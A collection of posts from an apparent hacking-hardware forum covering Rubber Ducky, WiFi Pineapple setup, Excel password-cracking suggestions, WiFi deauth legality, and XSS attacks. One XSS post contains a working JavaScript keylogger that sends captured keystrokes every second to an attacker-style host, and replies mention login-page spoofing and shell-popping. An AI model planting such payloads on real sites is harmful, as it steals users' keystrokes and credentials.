[Run Exe From Ducky... Possible?]

The Rubber Ducky is a Human Interface Device (HID) that types like a keyboard. It is not meant to be used for flash storage and execution of .exe files in the way you seek. I don't know about Twin Duck and it's capabilities so if you think it may work then do some more research. The only way I can think of executing a file is to use the ducky to either download the file first or access it from a flash drive that you insert along with it and execute it via command prompt or PowerShell.

As far as hiding windows during this process I have used some scripts from DuckToolkit that use keyboard commands to move a window off screen while it's in use. Other than that I don't think there is a way to do what you want with the ducky.

[New firmware coming out soon and MITMf integration on the cards!]

Very well. In that case, I would gladly welcome our robot overlords if they would only gift us with wonderful new firmware.

[New firmware coming out soon and MITMf integration on the cards!]

How do you know? Have you been there? Are you a robot? Do you and your robot friends have plans to exist forever and wipe out humanity?

[New firmware coming out soon and MITMf integration on the cards!]

Soon.

In the future.

When there are robots.

But robots exist now...

[How to set up Mark V on home router]

It won't work that way because you need to access it by the IP the router gave to it. There are now two networks involved here. The Pineapple network on 172.16.42.0 and your home network which is most likely 192.168.1.0. Find the IP address assigned to the ethernet interface and you will be able to connect to it while on your home network.

[After restart, can't access Mark V SSH or web interface via eth cable.]

Karma logs fill up quickly. Make sure you point Karma to somewhere on the SD card so it won't crash your system. The default location for the log should be in the /tmp directory so it will not persist between reboots but after about an hour of activity it could log a lot of info. There isn't a lot of internal space on the Pineapple to begin with so once it fills up the behavior can get wonky.

[.xlsx password protected excell 2013... password crack]

I found this forum through a quick Google search. I have never tried any of these methods but some of them sound like they're worth a shot. (http://community.spiceworks.com/topic/328118-need-to-unlock-a-password-protected-excel-2010-workbook)

Some of the noteworthy attempts are:

1. Move it to Linux and open with Open Office. Some people claim it will open without regard to the password. However, since the file is supposed to be encrypted with that password I'm not sure this will work.

2. If you can open the file but not edit you may be able to use VBA code to brute force the password.

3. Upload to Google Docs and download as a regular workbook (if you can access it and not edit)

Many of the users on that forum are claiming the VBA code in one of the posts works perfectly for bypassing the password in 2013 but I would execute it in a VM just to be careful. VBA code can be dangerous if you don't know exactly what it does.

[How to set up Mark V on home router]

You can connect it as a client to your home network over WiFi. Go into the Network infusion, select the Client tab, find the SSID of your AP and connect to it.

[Portable 400watt Solar Box]

As a veteran myself you have gained so much more respect from me. While it may not be the most efficient device it is certainly far more than that man has now.

[Simple Mark V Question...Please Help!]

Does the Pineapple work? Can you get to the web interface? If so, why do the LEDs matter so much?

[[Support] Evil Portal]

I'll just say the previews have never worked for me either on Chrome and Firefox. Honestly, I see no need to have the preview windows because if I want to see how a portal looks I just open my browser.

[Will I like turtles?]

Using the new gear sounds awesome but I really want to attend the training. Unfortunately, California is just too far away.

[SFTP keeps disconnecting]

I recommend using WinSCP. I never have problems using it with my Pineapple.

[Will I like turtles?]

This looks awesome! I really want to go but I don't think I'll be able to.

[Is XSS good for anything other than cookie stealing and key logging?]

That's really cool. I've noticed that Windows stores credentials to attempt authentication automatically with local resource shares but I always overlooked the potential danger in that.

[Deauth and Jamming Illegal]

Guys, let's not forget, that a newly purchased MKV does not come with a DEAUTH infusion. You have the option to download the infusion and use it for personal use. Maybe Hak5 should put a disclaimer or something like that prior to downloading an infusion.

The MKV, could be used for many other things such as an ABS tracker, Pentesting/auditing etc...

Also, not all of us live in the US. I'm sure there are some/many countries that have no law regarding this.

Cheers

PineAP has the ability to deauth although I assume people are using the infusion more.

I, too, think a disclaimer is unnecessary. Using anything on the Pineapple against a network/device you do not own without proper consent is illegal already.

[Arduino chess robotic arm]

That's not enough cash. I don't think you understand just how much work would go into a project like this.

[Deauth and Jamming Illegal]

I did a quick search of the forums but didn't find anything related to this. I came across this page on the FCC's site that states deauth attacks and jamming of WiFi are illegal in the US as of January, 2015. They also state the following:

In addition, we reiterate that Federal law prohibits the operation, marketing, or sale of any type of jamming equipment, including devices that interfere with Wi-Fi, cellular, or public safety communications. Detailed information about the prohibition against jamming is available on the Commission’s website at http://www.fcc.gov/encyclopedia/jammer-enforcement.

If you read the example they gave about a Marriott hotel deauthenticating users it appears the FCC doesn't know the different between that and jamming a signal. Of course they added that catch-all statement that any device that interferes with WiFi communications is illegal. Page 2 of that document states that no commercial establishment is allowed to block WiFi communication but the next paragraph down has the quote I posted above. It would appear that using the deauth feature of the Pineapple is now illegal, unless if I'm misinterpreting this.

[Arduino chess robotic arm]

No one is going to do all of that work for you unless if you have some cash for them.

[Is XSS good for anything other than cookie stealing and key logging?]

Check out the Browser Exploitation Framework (BEeF). It will show you lots of things you can do with XSS.

Thanks, I'll definitely look into it.

Going manual, I really like rewriting the current page to look like the sites login screen

Do you typically do this through JS redirects or iframes? Do you have an opinion on which is better to use?

[Is XSS good for anything other than cookie stealing and key logging?]

Thanks for the info. I also found this article (http://www.12robots.com/index.cfm/2010/9/14/Whats-Possible-with-XSS--Security-Series-81) which is quite informative and has some decent examples.

[Is XSS good for anything other than cookie stealing and key logging?]

CSRF, forcing logged in users to change settings to their accounts, DNS rebinding...including popping a shell on a machine...

What would the environment have to look like in order to accomplish these attacks? The extent of my knowledge in XSS right now is stealing credentials and key logging. Although I can think of other types of attacks I have no idea what the environment would have to look like in order to carry out any of them.

[Is XSS good for anything other than cookie stealing and key logging?]

I've recently been looking into XSS attacks and I see how they are useful for gathering cookies from a site but can they be used for anything else? I have a site that is vulnerable to XSS attacks but it doesn't store any cookies. I've used this code to log keystrokes from the site

<script>
var keys = '';
 
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

window.setInterval(function(){
    new Image().src = 'http://www.myattacksite.com/stealer.php?c=' + keys;
    keys = '';
}, 1000);
</script>

which is really cool but it doesn't return any impressive results without a login form on the page. I guess it would be possible to try and redirect the user to a page that performs a browser based attack, possibly something with Metasploit.

Have you guys come across any useful XSS attacks that don't involve cookies or keylogging?

[What's the usage for the Large antenna and the USB wifi adapter you get with ultra`?]

Not sure if you are plugging it in while the Pineapple is turned on but fugu is right. I've done that before with my Panda wireless adapter and it causes the Pineapple to reboot. If I have it plugged in before I turn the Pineapple on everything is fine.

[Got PineAP(not pineapple) questions? Let me answer them!]

The errors it throws out aren't a problem. Like I said before you will need to suppress any output you don't want. Those errors come from the fact that by the time the program gets to those SSIDs the interface has already connected to an AP.

To receive an IP address use this command

udhcpc -i wlan1

I'm currently working on implementing this in my infusion PortalAuth. You will be able to use a DIP switch to scan, connect, check for a portal, automatically clone it, and authenticate without using the interface. You will also be able to use the script solely for connecting and getting an IP on an open AP without the other PortalAuth features.